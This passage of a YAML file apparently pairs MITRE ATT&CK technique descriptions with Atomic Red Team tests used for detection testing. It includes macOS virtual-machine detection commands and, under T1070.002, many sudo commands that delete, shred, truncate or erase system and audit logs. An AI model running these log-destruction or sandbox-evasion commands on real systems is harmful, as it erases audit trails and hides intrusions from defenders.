For example, a file’s signature (also known as its header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type: the header of a JPEG file is 0xFF 0xD8 and the file extension is `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) are typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as giving PHP backdoor code a file name like test.gif. 
A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malware and malicious capabilities.(Citation: polygot_icedID)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - CrowdStrike Falcon OverWatch - Ben Smith x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.1' atomic_tests: [] T1564: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8 created: '2020-02-26T17:41:25.933Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564 external_id: T1564 - source_name: Cybereason OSX Pirrit description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021. url: https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf - source_name: MalwareBytes ADS July 2015 description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018. url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ - source_name: Sofacy Komplex Trojan description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - source_name: Sophos Ragnar May 2020 description: SophosLabs. (2020, May 21). 
Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020. url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:31.407Z' name: Hide Artifacts description: |- Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - Office Suite - Windows - macOS - ESXi x_mitre_version: '1.4' identifier: T1564 atomic_tests: [] T1484.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee created: '2020-12-28T21:59:02.181Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1484/002 external_id: T1484.002 - source_name: AWS 
RE:Inforce Threat Detection 2024 description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and techniques for proactive threat detection. Retrieved September 25, 2024. url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf - source_name: CISA SolarWinds Cloud Detection description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021. url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a - source_name: AADInternals zure AD Federated Domain description: Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022. url: https://o365blog.com/post/federation-vulnerability/ - source_name: Microsoft - Azure AD Federation description: Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020. url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020. url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml - source_name: Microsoft - Update or Repair Federated domain description: Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020. url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 - source_name: Okta Cross-Tenant Impersonation 2023 description: 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.' 
url: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection - source_name: Sygnia Golden SAML description: Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. url: https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:32.244Z' name: Domain Trust Modification description: "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges. Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. 
An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \n\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Blake Strom, Microsoft 365 Defender - Praetorian - Obsidian Security x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Identity Provider - Windows x_mitre_version: '2.2' identifier: T1484.002 atomic_tests: [] T1562.009: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--28170e17-8384-415c-8486-2e6b294cb803 created: '2021-06-23T20:00:27.600Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/009 external_id: T1562.009 - source_name: BleepingComputer REvil 2021 description: Abrams, L. (2021, March 19). 
REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021. url: https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/ - source_name: Cybereason Nocturnus MedusaLocker 2020 description: Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021. url: https://www.cybereason.com/blog/medusalocker-ransomware - source_name: Microsoft Bootcfg description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021. url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg - source_name: Microsoft bcdedit 2021 description: Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit - source_name: Microsoft Safe Mode description: Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021. url: https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234 - source_name: CyberArk Labs Safe Mode 2016 description: 'Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.' url: https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise - source_name: Sophos Snatch Ransomware 2019 description: Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021. url: https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:33.044Z' name: 'Impair Defenses: Safe Boot Mode' description: |- Adversaries may abuse Windows safe mode to disable endpoint defenses. 
Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019) Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021) Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Jorell Magtibay, National Australia Bank Limited - Kiyohito Yamamoto, RedLark, NTT Communications - Yusuke Kubo, RedLark, NTT Communications x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1562.009 atomic_tests: [] T1542.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 created: '2020-10-20T00:06:56.180Z' 
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1542/005 external_id: T1542.005 - source_name: Cisco Blog Legacy Device Attacks description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - source_name: Cisco IOS Software Integrity Assurance - Secure Boot description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 - source_name: Cisco IOS Software Integrity Assurance - Image File Verification description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 - source_name: Cisco IOS Software Integrity Assurance - Command History description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 - source_name: Cisco IOS Software Integrity Assurance - Boot Information description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020. 
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:33.317Z' name: TFTP Boot description: |- Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. 
(Citation: Cisco Blog Legacy Device Attacks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: '1.1' atomic_tests: [] T1497.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6 created: '2020-03-06T20:57:37.959Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1497/001 external_id: T1497.001 - source_name: Unit 42 OilRig Sept 2018 description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018. url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/ - source_name: McAfee Virtual Jan 2017 description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019. url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/ - source_name: Deloitte Environment Awareness description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024. url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:33.591Z' name: 'Virtualization/Sandbox Evasion: System Checks' description: "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. 
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters' addresses, CPU core count, and available memory/drive size. 
Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative of a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Deloitte Threat Library Team - Kostya Vasilkov x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '2.3' identifier: T1497.001 atomic_tests: - name: Detect Virtualization Environment via ioreg auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09 description: 'ioreg contains registry entries for all the device drivers in the system. If it''s a virtual machine, one of the device manufacturers will be a virtualization software vendor. 
' supported_platforms: - macos executor: name: sh elevation_required: false command: 'if (ioreg -l | grep -e Manufacturer -e ''Vendor Name'' | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; ' - name: Detect Virtualization Environment using sysctl (hw.model) auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c description: | sysctl hw.model will return the model name of the hardware (Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware but will return the hypervisor name (VMware7,0). Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model supported_platforms: - macos executor: name: sh command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected''; fi; ' - name: Check if System Integrity Protection is enabled auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 description: "The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring purposes, the SIP feature must be disabled to load this kind of kernel extension.\nMalware may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n" supported_platforms: - macos executor: name: sh command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo ''Possible Virtualization Environment detected''; fi; ' - name: Detect Virtualization Environment using system_profiler auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f description: "system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model). 
\nWe should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain \"Mac\".\n" supported_platforms: - macos executor: name: sh command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier" | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected''; fi; ' T1070.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36 created: '2020-01-28T17:11:54.034Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/002 external_id: T1070.002 - source_name: Linux Logs description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020. url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:34.441Z' name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs' description: | Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. 
Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs) * /var/log/messages:: General and system-related messages * /var/log/secure or /var/log/auth.log: Authentication logs * /var/log/utmp or /var/log/wtmp: Login records * /var/log/kern.log: Kernel logs * /var/log/cron.log: Crond logs * /var/log/maillog: Mail server logs * /var/log/httpd/: Web server access and error logs kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.0' identifier: T1070.002 atomic_tests: - name: rm -rf auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs ' supported_platforms: - macos - linux input_arguments: syslog_path: description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. 
type: string default: "/var/log/system.log" macos_audit_path: description: path of audit file to delete type: string default: "/var/audit/20220725213300.202208110700021" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path} ' get_prereq_command: | touch #{syslog_path} if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi executor: command: | sudo rm -rf #{syslog_path} if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true - name: Delete log files using built-in log utility auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1 description: 'This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content ' supported_platforms: - macos executor: command: | sudo log erase --all sudo log erase --ttl #Deletes only time-to-live log content name: sh elevation_required: true - name: Truncate system log files via truncate utility auto_generated_guid: 6290f8a8-8ee9-4661-b9cf-390031bf6973 description: 'This test truncates the system log files using the truncate utility with (-s 0) parameter which sets file size to zero, thus emptying the file content ' supported_platforms: - macos input_arguments: system_log_path: description: path of system log to delete. 
type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'sudo truncate -s 0 #{system_log_path} #size parameter shorthand ' name: sh elevation_required: true - name: Delete log files via cat utility by appending /dev/null or /dev/zero auto_generated_guid: c23bdb88-928d-493e-b46d-df2906a50941 description: 'The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility ' supported_platforms: - macos input_arguments: system_log_path: description: path of system log to delete. type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: | sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros) name: sh elevation_required: true - name: System log file deletion via find utility auto_generated_guid: bc8eeb4a-cc3e-45ec-aa6e-41e973da2558 description: 'This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink) ' supported_platforms: - macos input_arguments: system_log_name1: description: name or prefix of system log to delete. type: string default: system.log system_log_name2: description: name or prefix of system log to delete. type: string default: system.log.97.gz system_log_name3: description: name or prefix of system log to delete. 
type: string default: system.log.98.gz dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} ' get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} ' executor: command: | sudo find /var/log -name '#{system_log_name1}*' -exec rm {} \; #using "rm" execution sudo find /var/log -name "#{system_log_name2}*" -exec shred -u -z -n 3 {} \; #using "shred" execution sudo find /var/log -name "#{system_log_name3}*" -exec unlink {} \; #using "unlink" execution name: sh elevation_required: true - name: Overwrite macOS system log via echo utility auto_generated_guid: '0208ea60-98f1-4e8c-8052-930dce8f742c' description: 'This test overwrites the contents of system log file with an empty string using echo utility ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" executor: command: 'sudo echo '''' > #{system_log_path} ' name: sh elevation_required: true - name: Real-time system log clearance/deletion auto_generated_guid: 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c description: 'This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process ' supported_platforms: - macos executor: command: 'sudo log -f /var/log/system.log | : > /var/log/system.log ' name: sh elevation_required: true - name: Delete system log files via unlink utility auto_generated_guid: 03013b4b-01db-437d-909b-1fdaa5010ee8 description: 'This test deletes the system log file using unlink utility ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' 
get_prereq_command: 'touch #{system_log_path} ' executor: command: 'sudo unlink #{system_log_path} ' name: sh elevation_required: true - name: Delete system log files using shred utility auto_generated_guid: 86f0e4d5-3ca7-45fb-829d-4eda32b232bb description: 'This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'sudo shred -u -z -n 3 #{system_log_path} ' name: sh elevation_required: true - name: Delete system log files using srm utility auto_generated_guid: b0768a5e-0f32-4e75-ae5b-d036edcf96b6 description: | This test securely deletes the system log files individually and recursively using the srm utility. 
Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm Refer: https://github.com/khell/homebrew-srm/issues/1 for installation supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" system_log_folder: description: path to log parent folder type: string default: "/var/log/" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} #{system_log_folder} ' get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log ' executor: command: | sudo srm #{system_log_path} #system log file deletion sudo srm -r #{system_log_folder} #recursive deletion of log files name: sh elevation_required: true - name: Delete system log files using OSAScript auto_generated_guid: 810a465f-cd4f-47bc-b43e-d2de3b033ecc description: 'This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator privileges'' ' name: sh elevation_required: true - name: Delete system log files using Applescript auto_generated_guid: e62f8694-cbc7-468f-862c-b10cd07e1757 description: | This test deletes the system log file using applescript using osascript via Finder application Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework. 
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"'' ' name: sh elevation_required: true T1218.004: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2cd950a6-16c4-404a-aa01-044322395107 created: '2020-01-23T19:09:48.811Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/004 external_id: T1218.004 - source_name: MSDN InstallUtil description: Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016. url: https://msdn.microsoft.com/en-us/library/50614e95.aspx - source_name: LOLBAS Installutil description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:34.798Z' name: 'Signed Binary Proxy Execution: InstallUtil' description: |- Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: 